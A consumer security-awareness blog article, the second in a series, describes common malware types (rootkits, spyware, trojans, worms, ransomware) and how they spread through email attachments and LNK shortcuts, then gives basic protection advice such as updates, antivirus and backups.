Cyber attacks against private users and ways to protect against them OnlineSim
Jul 14 21:19:52, 2023
Common types of cyber attacks against private users and ways to protect against them. Part 2
In the previous article, we talked about phishing, cryptojacking and man-in-the-middle (MITM) cyber attacks.
In this article, we will discuss different types of malware and how hackers use them to steal information and money.
Before you start reading, have a look at which industries undergo the most frequent cyber attacks.
Hackers launch cyber attacks by spreading malware through email or messengers. They would typically add an accompanying text to the email telling the victim about a big win, a surprise inheritance or something else that would entice them to download and open the attached file or follow the provided link.
The attached file in most cases contains a malicious program. Even if the file appears secure and does not look like a suspicious RAR archive, it may still contain a virus. For example, a Word document may contain a malicious script written in Visual Basic, a programming language in Microsoft Office.
When the user opens such a document, Microsoft Office would prompt him/her to run some scripts. If the user agrees, malware will be downloaded from the attackers’ website and installed on the victim computer. The malicious program will launch, scan the network and the local memory for stored files and steal, compromise or encrypt different files.
Another scenario is infection through LNK files which are commonly known as file shortcuts. In Windows, they are used as links to original files. This file type has information about the file name, location and the software with which the file can be opened.
LNK files crafted by attackers execute malicious VBScript or Powershell scripts that are embedded in them.This method helps to bypass Windows security systems and infect PCs.
PowerShell is a special Windows engine that helps to:
Change settings of the operating system
Control services and processes
Configure server roles and components
Malware propagation via LNK files occurs as follows:
The victim user receives a phishing email with an attached ZIP archive. The archive contains a malicious LNK shortcut.
The user opens the archive and clicks on the shortcut, which, in turn, runs a Powershell script which downloads a malicious DLL with a malicious loader.
The loader allocates an area of memory where the DLL is loaded and a specific resource is decrypted.
There are several kinds of malware, as described below.
A rootkit is malware that attacks a victim computer and enables remote control over it, most often without being detected by the user or an antivirus.
If a user installs a rootkit, the attackers can remotely launch files, steal user’s files, install other malware and control the infected computer as part of a botnet. It can also modify the software installed on the victim computer, including the software that can detect the rootkit.
Spyware attacks victim machines and stealthily monitors user actions. Such malicious programs can collect data about the user's cyber activity, log the keystrokes, collect information about accounts, logins, passwords and financial data.
Spyware, just like rootkits, in most cases changes the security settings of PCs or browsers. It is commonly spread in combination with Trojans, using social engineering or phishing techniques.
Social engineering is a cyber security threat and method of acquiring the victim user's confidential information through psychological manipulation. The acquired information is used to withdraw money from the victim’s bank card, gain control over the victim's accounts or pressure him/her to do something.
Trojans are a type of malware that infiltrates computers under the guise of a regular and safe application. Trojans act surreptitiously and lull the users into a false sense of security, just like the Trojan horse that was given as a present to the inhabitants of Troy in ancient Greece.
Unlike viruses and worms which spread spontaneously, a Trojan can capture information only after a user has installed it. Once downloaded and installed, Trojans can give the attackers remote access to the victim computers, steal information, such as credentials, financial data and even electronic money, or install other malicious applications.
For a detailed technical description of how the Trojan operated, which codes and system commands it used, please see the Microsoft security writeup. Provided below is a diagram of how it worked.
A virus is another kind of malware that can replicate itself and propagate between computers. Viruses can spread via documents, web scripts or applications. They are used for stealing information or money, creating botnets, hidden mining etc.
Worms are among the most common types of malware. They replicate by spreading their own copies across a cyber network through exploitation of operating system vulnerabilities. They are usually used to launch cyber attacks against and damage host networks through congestion of bandwidth and overloading of servers. Sometimes, worms contain code to help steal data from computers, delete files or create botnets.
Worms propagate across networks using two mechanisms:
Exploitation of security vulnerabilities and administration errors in installed software. Such worms can propagate automatically by launching attacks against computers on their own.
Social engineering, when the attackers trick a person into running a malicious program. Such worms are most often distributed through spam mailings, social networks etc.
There is another classification of worms according to their mechanism of propagation:
Email worms propagate via emails
IM worms propagate via Facebook, Skype or WhatsApp
IRC worms propagate via IRC (Internet relay chat) channels. Internet relay chat is a cyber protocol that allows users to connect to the server using a dedicated client, access channels or chats and exchange messages in real time by typing them on the keyboard.
Net worms or network worms propagate across networks and do not rely on the user as a link in their distribution chain.
P2P worms propagate via any peer-to-peer file sharing network, such as Kazaa, Grokster, EDonkey, FastTrack or Gnutella.
Ransomware is a type of malware that attacks the victim computer, blocks access to it or encrypts data on it. In order to get the computer back to its previous working state, victims are demanded to pay a ransom.
Several hundred millions of such attacks occur per year, according to analysis by Statista.
Most of such attacks are launched via an email containing malicious links to the attackers' website. When users follow the link, they download the malware. Alternatively, the email may contain an attachment with a malicious file that will download the ransomware as soon as the user opens it.
There are two types of ransomware. A description of each type follows.
This type of malware attacks the victim computer and blocks its most basic functions, for example it can partially disable the mouse and keyboard and/or restrict access to the desktop. The computer will remain in this state until the victim user pays the ransom to the hackers' account.
Non-encrypting ransomware is not always dangerous as such malicious programs usually do not have the goal of stealing important files. Their goal is simply to block the victim device and wait for the ransom.
Such a malicious program attacks the victim computer and encrypts important data on it, such as personal information or photos, without affecting the computer’s operation. In this case, the hackers play on the victim's fear, as the user sees the files are physically on the computer, but cannot use them.
Files are typically encrypted using the AES algorithm with a key size of 128/196/256 bits. Such a key is practically impossible to break by direct search. Some ransomware programs use cryptographic systems with a public/private key, such as RSA.
To learn more about encryption and how it works, read the article "What is VPN and how it works".
When the files are encrypted, a window will be displayed to the victim with a text, such as "Pay the ransom within an hour, or all encrypted files will be deleted". Thus, the user will have to pay the ransom to have his/her files decrypted.
However, even when the victim has paid the ransom, there are no guarantees he/she will receive the decryption key from the attackers. So, there is a risk that the files can remain encrypted forever.
How to protect against malware and ransomware
Keep your software up to date. Software manufacturers always collect information about security problems and release new versions with patches addressing those problems.
Install an antivirus and have it running at all times — it will protect you against the most types of attacks, such as installing malware and following dangerous links. If someone sends you a malicious application, the antivirus will block the malware. The same goes for a malicious link — the antivirus will detect it and prevent you from following it.
Better yet, don't download or run any suspicious files at all. Your antivirus may not detect some malicious programs until they run. Thus, they can damage some important file of the operating system and affect your computer’s operation.
Check who sends you links. Don't click on links sent by strangers or your friends without any accompanying text. If you receive a link in the name of someone you know, contact them personally and ask them what they sent. Their account may have been hacked, and spam may be sent in their name.
Make regular backups of your system and all important files. You can copy files to physical media or in the cloud. Cloud is preferable than physical media, as it is protected from malware, breaking and similar problems.
As an option, you can set up automatic backups using third-party services, such as Redo Backup and Recovery, EASEUS Todo Backup Free or Cobian Backup. Remember, though, that cloud storage is not completely secure either — data leaks can occur there, too.
In 2014, for example, attackers distributed links to phishing sites, which users visited and gave away their passwords to various services, including iCloud.
As a result, naked photos of Jennifer Lawrence, Rihanna, and dozens of other celebrities were leaked. According to some estimates, the attackers hijacked 300 accounts in Apple iCloud and Gmail over the period from November 2013 to August 2014.
It should be also remembered that cloud services sometimes can go down, so your information in the cloud can become unavailable for some time.